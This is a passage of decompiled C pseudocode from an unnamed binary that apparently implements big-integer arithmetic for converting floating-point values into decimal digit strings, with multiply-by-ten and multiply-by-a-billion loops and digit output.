											_v1892 = _t1139;
											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
											__eflags = _t1139 - 0x73;
											_v1865 = _t965;
											_t1077 = _t1076 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
											__eflags = _t1139 - 0x73;
											if(_t1139 != 0x73) {
												L59:
												_t966 = 0;
												__eflags = 0;
											} else {
												__eflags = _t965;
												if(_t965 == 0) {
													goto L59;
												} else {
													_t966 = 1;
												}
											}
											__eflags = _t1077;
											if(_t1077 != 0) {
												L81:
												__eflags = 0;
												_t1025 = 0x1cc;
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t966;
												if(_t966 != 0) {
													goto L81;
												} else {
													_t1078 = 0x72;
													__eflags = _t1139 - _t1078;
													if(_t1139 >= _t1078) {
														_t1139 = _t1078;
														_v1892 = _t1078;
													}
													_t974 = _t1139;
													_v1880 = _t974;
													__eflags = _t1139 - 0xffffffff;
													if(_t1139 != 0xffffffff) {
														_t1140 = _v1872;
														_t1229 = _t1139 - _t1140;
														__eflags = _t1229;
														_t1082 =  &_v468 + _t1229 * 4;
														_v1888 = _t1082;
														while(1) {
															__eflags = _t974 - _t1140;
															if(_t974 < _t1140) {
																break;
															}
															__eflags = _t1229 - _t1022;
															if(_t1229 >= _t1022) {
																_t1186 = 0;
																__eflags = 0;
															} else {
																_t1186 =  *_t1082;
															}
															__eflags = _t1229 - 1 - _t1022;
															if(_t1229 - 1 >= _t1022) {
																_t979 = 0;
																__eflags = 0;
															} else {
																_t979 =  *(_t1082 - 4);
															}
															_t982 = _v1880;
															_t1082 = _v1888 - 4;
															_v1888 = _t1082;
															 *(_t1235 + _t982 * 4 - 0x1d0) = (_t1186 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
															_t974 = _t982 - 1;
															_t1229 = _t1229 - 1;
															_v1880 = _t974;
															__eflags = _t974 - 0xffffffff;
															if(_t974 != 0xffffffff) {
																_t1022 = _v472;
																continue;
															}
															break;
														}
														_t1139 = _v1892;
														_t1183 = _v1872;
														_t1227 = 2;
													}
													__eflags = _t1183;
													if(_t1183 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1183 << 2);
														_t1237 =  &(_t1237[3]);
													}
													__eflags = _v1865;
													_t1025 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1139;
													} else {
														_v472 = _t1139 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1227;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1086 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1235 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0));
												if( *((intOrPtr*)(_t1235 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0))) {
													goto L53;
												}
												_t1086 = _t1086 + 4;
												__eflags = _t1086 - 8;
												if(_t1086 != 8) {
													continue;
												} else {
													_t985 = _v1872 + 2;
													_t986 = _t985 & 0x0000001f;
													_t1087 = 0x20;
													_t1088 = _t1087 - _t986;
													_v1888 = _t986;
													_t1231 = _t985 >> 5;
													_v1876 = _t1231;
													_v1908 = _t1088;
													_t989 = E0007E7C0(1, _t1088, 0);
													_v1896 = _v1896 & 0x00000000;
													_t990 = _t989 - 1;
													__eflags = _t990;
													asm("bsr ecx, edi");
													_v1884 = _t990;
													_v1912 =  !_t990;
													if(_t990 == 0) {
														_t1089 = 0;
														__eflags = 0;
													} else {
														_t1089 = _t1088 + 1;
													}
													_t992 = 0x20;
													_t993 = _t992 - _t1089;
													_t1142 = _t1231 + 2;
													__eflags = _v1888 - _t993;
													_v1880 = _t1142;
													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
													__eflags = _t1142 - 0x73;
													_v1865 = _t994;
													_t1090 = _t1089 & 0xffffff00 | _t1142 - 0x00000073 > 0x00000000;
													__eflags = _t1142 - 0x73;
													if(_t1142 != 0x73) {
														L28:
														_t995 = 0;
														__eflags = 0;
													} else {
														__eflags = _t994;
														if(_t994 == 0) {
															goto L28;
														} else {
															_t995 = 1;
														}
													}
													__eflags = _t1090;
													if(_t1090 != 0) {
														L50:
														__eflags = 0;
														_t1025 = 0x1cc;
														_push(0);
														_v1400 = 0;
														_v472 = 0;
														_push( &_v1396);
														_push(0x1cc);
														_push( &_v468);
														L313();
														_t1237 =  &(_t1237[4]);
													} else {
														__eflags = _t995;
														if(_t995 != 0) {
															goto L50;
														} else {
															_t1093 = 0x72;
															__eflags = _t1142 - _t1093;
															if(_t1142 >= _t1093) {
																_t1142 = _t1093;
																_v1880 = _t1093;
															}
															_t1094 = _t1142;
															_v1892 = _t1094;
															__eflags = _t1142 - 0xffffffff;
															if(_t1142 != 0xffffffff) {
																_t1143 = _v1876;
																_t1233 = _t1142 - _t1143;
																__eflags = _t1233;
																_t1004 =  &_v468 + _t1233 * 4;
																_v1872 = _t1004;
																while(1) {
																	__eflags = _t1094 - _t1143;
																	if(_t1094 < _t1143) {
																		break;
																	}
																	__eflags = _t1233 - _t1022;
																	if(_t1233 >= _t1022) {
																		_t1192 = 0;
																		__eflags = 0;
																	} else {
																		_t1192 =  *_t1004;
																	}
																	__eflags = _t1233 - 1 - _t1022;
																	if(_t1233 - 1 >= _t1022) {
																		_t1006 = 0;
																		__eflags = 0;
																	} else {
																		_t1006 =  *(_v1872 - 4);
																	}
																	_t1099 = _v1892;
																	 *(_t1235 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1192 & _v1884) << _v1888;
																	_t1094 = _t1099 - 1;
																	_t1233 = _t1233 - 1;
																	_t1004 = _v1872 - 4;
																	_v1892 = _t1094;
																	_v1872 = _t1004;
																	__eflags = _t1094 - 0xffffffff;
																	if(_t1094 != 0xffffffff) {
																		_t1022 = _v472;
																		continue;
																	}
																	break;
																}
																_t1142 = _v1880;
																_t1231 = _v1876;
															}
															__eflags = _t1231;
															if(_t1231 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1231 << 2);
																_t1237 =  &(_t1237[3]);
															}
															__eflags = _v1865;
															_t1025 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1142;
															} else {
																_v472 = _t1142 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t999 = 4;
													__eflags = 1;
													_v1396 = _t999;
													_v1400 = 1;
													_v936 = 1;
													_push(_t999);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1025);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[4]);
									}
									_t782 = _v1904;
									_t1043 = 0xa;
									_v1912 = _t1043;
									__eflags = _t782;
									if(_t782 < 0) {
										_t783 =  ~_t782;
										_t784 = _t783 / _t1043;
										_v1880 = _t784;
										_t1044 = _t783 % _t1043;
										_v1884 = _t1044;
										__eflags = _t784;
										if(_t784 == 0) {
											L249:
											__eflags = _t1044;
											if(_t1044 != 0) {
												_t820 =  *(0x97d8c + _t1044 * 4);
												_v1896 = _t820;
												__eflags = _t820;
												if(_t820 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t820 - 1;
													if(_t820 != 1) {
														_t1055 = _v472;
														__eflags = _t1055;
														if(_t1055 != 0) {
															_t1161 = 0;
															_t1213 = 0;
															__eflags = 0;
															do {
																_t1113 = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) >> 0x20;
																 *(_t1235 + _t1213 * 4 - 0x1d0) = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) + _t1161;
																_t820 = _v1896;
																asm("adc edx, 0x0");
																_t1213 = _t1213 + 1;
																_t1161 = _t1113;
																__eflags = _t1213 - _t1055;
															} while (_t1213 != _t1055);
															__eflags = _t1161;
															if(_t1161 != 0) {
																_t826 = _v472;
																__eflags = _t826 - 0x73;
																if(_t826 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1235 + _t826 * 4 - 0x1d0) = _t1161;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t784 - 0x26;
												if(_t784 > 0x26) {
													_t784 = 0x26;
												}
												_t1056 =  *(0x97cf6 + _t784 * 4) & 0x000000ff;
												_v1872 = _t784;
												_v1400 = ( *(0x97cf6 + _t784 * 4) & 0x000000ff) + ( *(0x97cf7 + _t784 * 4) & 0x000000ff);
												E0007F350(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
												_t837 = E0007F4B0( &(( &_v1396)[_t1056]), 0x973f0 + ( *(0x97cf4 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x97cf7 + _t784 * 4) & 0x000000ff) << 2);
												_t1057 = _v1400;
												_t1241 =  &(_t1241[6]);
												_v1892 = _t1057;
												__eflags = _t1057 - 1;
												if(_t1057 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1057 - _v472;
														_t1164 =  &_v1396;
														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
														__eflags = _t838;
														if(_t838 != 0) {
															_t1114 =  &_v468;
														} else {
															_t1164 =  &_v468;
															_t1114 =  &_v1396;
														}
														_v1908 = _t1114;
														__eflags = _t838;
														if(_t838 == 0) {
															_t1057 = _v472;
														}
														_v1876 = _t1057;
														__eflags = _t838;
														if(_t838 != 0) {
															_v1892 = _v472;
														}
														_t1115 = 0;
														_t1215 = 0;
														_v1864 = 0;
														__eflags = _t1057;
														if(_t1057 == 0) {
															L243:
															_v472 = _t1115;
															_t840 = _t1115 << 2;
															__eflags = _t840;
															_push(_t840);
															_t841 =  &_v1860;
															goto L244;
														} else {
															_t1165 = _t1164 -  &_v1860;
															__eflags = _t1165;
															_v1928 = _t1165;
															do {
																_t847 =  *(_t1235 + _t1165 + _t1215 * 4 - 0x740);
																_v1896 = _t847;
																__eflags = _t847;
																if(_t847 != 0) {
																	_t848 = 0;
																	_t1166 = 0;
																	_t1058 = _t1215;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1058 - 0x73;
																		if(_t1058 == 0x73) {
																			goto L258;
																		} else {
																			_t1165 = _v1928;
																			_t1057 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1058 - 0x73;
																			if(_t1058 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1058 - _t1115;
																			if(_t1058 == _t1115) {
																				 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
																				_t859 = _t848 + 1 + _t1215;
																				__eflags = _t859;
																				_v1864 = _t859;
																				_t848 = _v1888;
																			}
																			_t854 =  *(_v1908 + _t848 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t854 * _v1896 + _t1166;
																			asm("adc edx, 0x0");
																			_t848 = _v1888 + 1;
																			_t1058 = _t1058 + 1;
																			_v1888 = _t848;
																			_t1166 = _t854 * _v1896 >> 0x20;
																			_t1115 = _v1864;
																			__eflags = _t848 - _v1892;
																			if(_t848 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1166;
																				if(_t1166 == 0) {
																					goto L240;
																				}
																				__eflags = _t1058 - 0x73;
																				if(_t1058 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1058 - _t1115;
																					if(_t1058 == _t1115) {
																						_t558 = _t1235 + _t1058 * 4 - 0x740;
																						 *_t558 =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1058 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t852 = _t1166;
																					_t1166 = 0;
																					 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t852;
																					_t1115 = _v1864;
																					asm("adc edi, edi");
																					_t1058 = _t1058 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1215 - _t1115;
																	if(_t1215 == _t1115) {
																		 *(_t1235 + _t1215 * 4 - 0x740) =  *(_t1235 + _t1215 * 4 - 0x740) & _t847;
																		_t526 = _t1215 + 1; // 0x1
																		_t1115 = _t526;
																		_v1864 = _t1115;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1215 = _t1215 + 1;
																__eflags = _t1215 - _t1057;
															} while (_t1215 != _t1057);
															goto L243;
														}
													} else {
														_t1167 = _v468;
														_push(_t1057 << 2);
														_v472 = _t1057;
														_push( &_v1396);
														_push(_t1025);
														_push( &_v468);
														L313();
														_t1241 =  &(_t1241[4]);
														__eflags = _t1167;
														if(_t1167 == 0) {
															goto L203;
														} else {
															__eflags = _t1167 - 1;
															if(_t1167 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1059 = 0;
																	_v1896 = _v472;
																	_t1216 = 0;
																	__eflags = 0;
																	do {
																		_t867 = _t1167;
																		_t1116 = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) >> 0x20;
																		 *(_t1235 + _t1216 * 4 - 0x1d0) = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) + _t1059;
																		asm("adc edx, 0x0");
																		_t1216 = _t1216 + 1;
																		_t1059 = _t1116;
																		__eflags = _t1216 - _v1896;
																	} while (_t1216 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1168 = _v1396;
													__eflags = _t1168;
													if(_t1168 != 0) {
														__eflags = _t1168 - 1;
														if(_t1168 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1060 = 0;
																_v1896 = _v472;
																_t1217 = 0;
																__eflags = 0;
																do {
																	_t872 = _t1168;
																	_t1117 = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) >> 0x20;
																	 *(_t1235 + _t1217 * 4 - 0x1d0) = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) + _t1060;
																	asm("adc edx, 0x0");
																	_t1217 = _t1217 + 1;
																	_t1060 = _t1117;
																	__eflags = _t1217 - _v1896;
																} while (_t1217 != _v1896);
																L208:
																__eflags = _t1059;
																if(_t1059 == 0) {
																	goto L245;
																} else {
																	_t870 = _v472;
																	__eflags = _t870 - 0x73;
																	if(_t870 >= 0x73) {
																		L258:
																		_push(0);
																		_v2408 = 0;
																		_v472 = 0;
																		_push( &_v2404);
																		_push(_t1025);
																		_push( &_v468);
																		L313();
																		_t1241 =  &(_t1241[4]);
																		_t843 = 0;
																	} else {
																		 *(_t1235 + _t870 * 4 - 0x1d0) = _t1059;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t841 =  &_v2404;
														L244:
														_push(_t841);
														_push(_t1025);
														_push( &_v468);
														L313();
														_t1241 =  &(_t1241[4]);
														L245:
														_t843 = 1;
													}
												}
												L246:
												__eflags = _t843;
												if(_t843 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t823 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t784 = _v1880 - _v1872;
												__eflags = _t784;
												_v1880 = _t784;
											} while (_t784 != 0);
											_t1044 = _v1884;
											goto L249;
										}
									} else {
										_t875 = _t782 / _t1043;
										_v1908 = _t875;
										_t1061 = _t782 % _t1043;
										_v1896 = _t1061;
										__eflags = _t875;
										if(_t875 == 0) {
											L184:
											__eflags = _t1061;
											if(_t1061 != 0) {
												_t1169 =  *(0x97d8c + _t1061 * 4);
												__eflags = _t1169;
												if(_t1169 != 0) {
													__eflags = _t1169 - 1;
													if(_t1169 != 1) {
														_t876 = _v936;
														_v1896 = _t876;
														__eflags = _t876;
														if(_t876 != 0) {
															_t1218 = 0;
															_t1062 = 0;
															__eflags = 0;
															do {
																_t877 = _t1169;
																_t1121 = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) >> 0x20;
																 *(_t1235 + _t1062 * 4 - 0x3a0) = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) + _t1218;
																asm("adc edx, 0x0");
																_t1062 = _t1062 + 1;
																_t1218 = _t1121;
																__eflags = _t1062 - _v1896;
															} while (_t1062 != _v1896);
															__eflags = _t1218;
															if(_t1218 != 0) {
																_t880 = _v936;
																__eflags = _t880 - 0x73;
																if(_t880 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1235 + _t880 * 4 - 0x3a0) = _t1218;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t875 - 0x26;
												if(_t875 > 0x26) {
													_t875 = 0x26;
												}
												_t1063 =  *(0x97cf6 + _t875 * 4) & 0x000000ff;
												_v1888 = _t875;
												_v1400 = ( *(0x97cf6 + _t875 * 4) & 0x000000ff) + ( *(0x97cf7 + _t875 * 4) & 0x000000ff);
												E0007F350(_t1063 << 2,  &_v1396, 0, _t1063 << 2);
												_t893 = E0007F4B0( &(( &_v1396)[_t1063]), 0x973f0 + ( *(0x97cf4 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x97cf7 + _t875 * 4) & 0x000000ff) << 2);
												_t1064 = _v1400;
												_t1241 =  &(_t1241[6]);
												_v1892 = _t1064;
												__eflags = _t1064 - 1;
												if(_t1064 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1064 - _v936;
														_t1172 =  &_v1396;
														_t894 = _t893 & 0xffffff00 | _t1064 - _v936 > 0x00000000;
														__eflags = _t894;
														if(_t894 != 0) {
															_t1122 =  &_v932;
														} else {
															_t1172 =  &_v932;
															_t1122 =  &_v1396;
														}
														_v1876 = _t1122;
														__eflags = _t894;
														if(_t894 == 0) {
															_t1064 = _v936;
														}
														_v1880 = _t1064;
														__eflags = _t894;
														if(_t894 != 0) {
															_v1892 = _v936;
														}
														_t1123 = 0;
														_t1220 = 0;
														_v1864 = 0;
														__eflags = _t1064;
														if(_t1064 == 0) {
															L177:
															_v936 = _t1123;
															_t896 = _t1123 << 2;
															__eflags = _t896;
															goto L178;
														} else {
															_t1173 = _t1172 -  &_v1860;
															__eflags = _t1173;
															_v1928 = _t1173;
															do {
																_t903 =  *(_t1235 + _t1173 + _t1220 * 4 - 0x740);
																_v1884 = _t903;
																__eflags = _t903;
																if(_t903 != 0) {
																	_t904 = 0;
																	_t1174 = 0;
																	_t1065 = _t1220;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1065 - 0x73;
																		if(_t1065 == 0x73) {
																			goto L187;
																		} else {
																			_t1173 = _v1928;
																			_t1064 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1065 - 0x73;
																			if(_t1065 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1065 - _t1123;
																			if(_t1065 == _t1123) {
																				 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) & 0x00000000;
																				_t915 = _t904 + 1 + _t1220;
																				__eflags = _t915;
																				_v1864 = _t915;
																				_t904 = _v1872;
																			}
																			_t910 =  *(_v1876 + _t904 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) + _t910 * _v1884 + _t1174;
																			asm("adc edx, 0x0");
																			_t904 = _v1872 + 1;
																			_t1065 = _t1065 + 1;
																			_v1872 = _t904;
																			_t1174 = _t910 * _v1884 >> 0x20;
																			_t1123 = _v1864;
																			__eflags = _t904 - _v1892;
																			if(_t904 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1174;
																				if(_t1174 == 0) {
																					goto L174;
																				}
																				__eflags = _t1065 - 0x73;
																				if(_t1065 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t906 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1065 - _t1123;
																					if(_t1065 == _t1123) {
																						_t370 = _t1235 + _t1065 * 4 - 0x740;
																						 *_t370 =  *(_t1235 + _t1065 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1065 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t908 = _t1174;
																					_t1174 = 0;
																					 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) + _t908;
																					_t1123 = _v1864;
																					asm("adc edi, edi");
																					_t1065 = _t1065 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1220 - _t1123;
																	if(_t1220 == _t1123) {
																		 *(_t1235 + _t1220 * 4 - 0x740) =  *(_t1235 + _t1220 * 4 - 0x740) & _t903;
																		_t338 = _t1220 + 1; // 0x1
																		_t1123 = _t338;
																		_v1864 = _t1123;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1220 = _t1220 + 1;
																__eflags = _t1220 - _t1064;
															} while (_t1220 != _t1064);
															goto L177;
														}
													} else {
														_t1175 = _v932;
														_push(_t1064 << 2);
														_v936 = _t1064;
														_push( &_v1396);
														_push(_t1025);
														_push( &_v932);
														L313();
														_t1241 =  &(_t1241[4]);
														__eflags = _t1175;
														if(_t1175 != 0) {
															__eflags = _t1175 - 1;
															if(_t1175 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1066 = 0;
																	_v1884 = _v936;
																	_t1221 = 0;
																	__eflags = 0;
																	do {
																		_t922 = _t1175;
																		_t1124 = _t922 *  *(_t1235 + _t1221 * 4 - 0x3a0) >> 0x20;
																		 *(_t1235 + _t1221 * 4 - 0x3a0) = _t922 *  *(_t1235 + _t1221 * 4 - 0x3a0) + _t1066;
																		asm("adc edx, 0x0");
																		_t1221 = _t1221 + 1;
																		_t1066 = _t1124;
																		__eflags = _t1221 - _v1884;
																	} while (_t1221 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t897 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1176 = _v1396;
													__eflags = _t1176;
													if(_t1176 != 0) {
														__eflags = _t1176 - 1;
														if(_t1176 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1067 = 0;
																_v1884 = _v936;
																_t1222 = 0;
																__eflags = 0;
																do {
																	_t929 = _t1176;
																	_t1125 = _t929 *  *(_t1235 + _t1222 * 4 - 0x3a0) >> 0x20;
																	 *(_t1235 + _t1222 * 4 - 0x3a0) = _t929 *  *(_t1235 + _t1222 * 4 - 0x3a0) + _t1067;
																	asm("adc edx, 0x0");
																	_t1222 = _t1222 + 1;
																	_t1067 = _t1125;
																	__eflags = _t1222 - _v1884;
																} while (_t1222 != _v1884);
																L149:
																__eflags = _t1066;
																if(_t1066 == 0) {
																	goto L180;
																} else {
																	_t925 = _v936;
																	__eflags = _t925 - 0x73;
																	if(_t925 < 0x73) {
																		 *(_t1235 + _t925 * 4 - 0x3a0) = _t1066;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t906 =  &_v1396;
																		L188:
																		_push(_t906);
																		_push(_t1025);
																		_push( &_v932);
																		L313();
																		_t1241 =  &(_t1241[4]);
																		_t899 = 0;
																	}
																}
															}
														}
													} else {
														_t896 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t896);
														_t897 =  &_v1860;
														L179:
														_push(_t897);
														_push(_t1025);
														_push( &_v932);
														L313();
														_t1241 =  &(_t1241[4]);
														L180:
														_t899 = 1;
													}
												}
												L181:
												__eflags = _t899;
												if(_t899 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t823 =  &_v932;
													L262:
													_push(_t1025);
													_push(_t823);
													L313();
													_t1241 =  &(_t1241[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t875 = _v1908 - _v1888;
												__eflags = _t875;
												_v1908 = _t875;
											} while (_t875 != 0);
											_t1061 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1156 = _v1920;
									_t1208 = _t1156;
									_t1045 = _v472;
									_v1872 = _t1208;
									__eflags = _t1045;
									if(_t1045 != 0) {
										_t1212 = 0;
										_t1160 = 0;
										__eflags = 0;
										do {
											_t813 =  *(_t1235 + _t1160 * 4 - 0x1d0);
											_t1111 = 0xa;
											_t1112 = _t813 * _t1111 >> 0x20;
											 *(_t1235 + _t1160 * 4 - 0x1d0) = _t813 * _t1111 + _t1212;
											asm("adc edx, 0x0");
											_t1160 = _t1160 + 1;
											_t1212 = _t1112;
											__eflags = _t1160 - _t1045;
										} while (_t1160 != _t1045);
										_v1896 = _t1212;
										__eflags = _t1212;
										_t1208 = _v1872;
										if(_t1212 != 0) {
											_t1054 = _v472;
											__eflags = _t1054 - 0x73;
											if(_t1054 >= 0x73) {
												__eflags = 0;
												_push(0);
												_v2408 = 0;
												_v472 = 0;
												_push( &_v2404);
												_push(_t1025);
												_push( &_v468);
												L313();
												_t1241 =  &(_t1241[4]);
											} else {
												 *(_t1235 + _t1054 * 4 - 0x1d0) = _t1112;
												_v472 = _v472 + 1;
											}
										}
										_t1156 = _t1208;
									}
									_t787 = E0008CB60( &_v472,  &_v936);
									_t1104 = 0xa;
									__eflags = _t787 - _t1104;
									if(_t787 != _t1104) {
										__eflags = _t787;
										if(_t787 != 0) {
											_t788 = _t787 + 0x30;
											__eflags = _t788;
											_t1208 = _t1156 + 1;
											 *_t1156 = _t788;
											_v1872 = _t1208;
											goto L282;
										} else {
											_t789 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1208 = _t1156 + 1;
										_t805 = _v936;
										 *_t1156 = 0x31;
										_v1872 = _t1208;
										__eflags = _t805;
										if(_t805 != 0) {
											_t1159 = 0;
											_t1211 = _t805;
											_t1053 = 0;
											__eflags = 0;
											do {
												_t806 =  *(_t1235 + _t1053 * 4 - 0x3a0);
												 *(_t1235 + _t1053 * 4 - 0x3a0) = _t806 * _t1104 + _t1159;
												asm("adc edx, 0x0");
												_t1053 = _t1053 + 1;
												_t1159 = _t806 * _t1104 >> 0x20;
												_t1104 = 0xa;
												__eflags = _t1053 - _t1211;
											} while (_t1053 != _t1211);
											_t1208 = _v1872;
											__eflags = _t1159;
											if(_t1159 != 0) {
												_t809 = _v936;
												__eflags = _t809 - 0x73;
												if(_t809 >= 0x73) {
													_push(0);
													_v2408 = 0;
													_v936 = 0;
													_push( &_v2404);
													_push(_t1025);
													_push( &_v932);
													L313();
													_t1241 =  &(_t1241[4]);
												} else {
													 *(_t1235 + _t809 * 4 - 0x3a0) = _t1159;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t789 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t789;
									_t1031 = _v1916;
									__eflags = _t789;
									if(_t789 >= 0) {
										__eflags = _t1031 - 0x7fffffff;
										if(_t1031 <= 0x7fffffff) {
											_t1031 = _t1031 + _t789;
											__eflags = _t1031;
										}
									}
									_t791 = _a24 - 1;
									__eflags = _t791 - _t1031;
									if(_t791 >= _t1031) {
										_t791 = _t1031;
									}
									_t792 = _t791 + _v1920;
									_v1916 = _t792;
									__eflags = _t1208 - _t792;
									if(__eflags != 0) {
										while(1) {
											_t793 = _v472;
											__eflags = _t793;
											if(__eflags == 0) {
												goto L303;
											}
											_t1157 = 0;
											_t1209 = _t793;
											_t1049 = 0;
											__eflags = 0;
											do {
												_t794 =  *(_t1235 + _t1049 * 4 - 0x1d0);
												 *(_t1235 + _t1049 * 4 - 0x1d0) = _t794 * 0x3b9aca00 + _t1157;
												asm("adc edx, 0x0");
												_t1049 = _t1049 + 1;
												_t1157 = _t794 * 0x3b9aca00 >> 0x20;
												__eflags = _t1049 - _t1209;
											} while (_t1049 != _t1209);
											_t1210 = _v1872;
											__eflags = _t1157;
											if(_t1157 != 0) {
												_t800 = _v472;
												__eflags = _t800 - 0x73;
												if(_t800 >= 0x73) {
													__eflags = 0;
													_push(0);
													_v2408 = 0;
													_v472 = 0;
													_push( &_v2404);
													_push(_t1025);
													_push( &_v468);
													L313();
													_t1241 =  &(_t1241[4]);
												} else {
													 *(_t1235 + _t800 * 4 - 0x1d0) = _t1157;
													_v472 = _v472 + 1;
												}
											}
											_t799 = E0008CB60( &_v472,  &_v936);
											_t1158 = 8;
											_t1031 = _v1916 - _t1210;
											__eflags = _t1031;
											do {
												_t708 = _t799 % _v1912;
												_t799 = _t799 / _v1912;
												_t1109 = _t708 + 0x30;
												__eflags = _t1031 - _t1158;
												if(_t1031 >= _t1158) {
													 *((char*)(_t1158 + _t1210)) = _t1109;
												}
												_t1158 = _t1158 - 1;
												__eflags = _t1158 - 0xffffffff;
											} while (_t1158 != 0xffffffff);
											__eflags = _t1031 - 9;
											if(_t1031 > 9) {
